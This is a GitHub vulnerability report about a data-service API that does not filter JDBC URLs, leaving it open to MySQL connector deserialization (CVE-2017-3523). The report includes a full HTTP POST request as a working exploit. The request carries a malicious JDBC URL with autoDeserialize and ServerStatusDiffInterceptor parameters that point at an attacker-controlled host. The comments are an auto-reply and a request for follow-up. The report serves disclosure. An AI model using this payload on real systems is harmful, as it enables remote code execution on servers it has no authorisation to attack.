MySQL JDBC deserialization vulnerability

#1168 · open · 2 comments

View on GitHub ↗

Fushuling

The current project does not filter JDBC URLs, so attackers can inject malicious parameters to launch attacks. Furthermore, the current MySQL version is very old and affected by CVE-2017-3523, allowing attackers to deserialize MySQL via JDBC. <img width="870" height="273" alt="Image" src="https://github.com/user-attachments/assets/fe5ddaac-40b1-463b-83d1-8d3d0d5fd500" /> Below is an example of an attack. ``` POST /api/rest_j/v1/dss/data/api/datasource/test HTTP/1.1 Host: <dss-host>:<port> Content-Type: application/json;charset=UTF-8 Cookie: bdp-user-ticket-id=xxx Content-language: zh-CN {"workspaceId":1,"name":"probe","username":"root","type":"MYSQL","note":"","url":"jdbc:mysql://xxxx:3306/test?autoDeserialize=true&statementInterceptors=com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor","pwd":"x"} ````

Comments

hangpengyue

您发的邮件,我已收到。

Fushuling

Hello, is there any follow-up to this report? Thank you.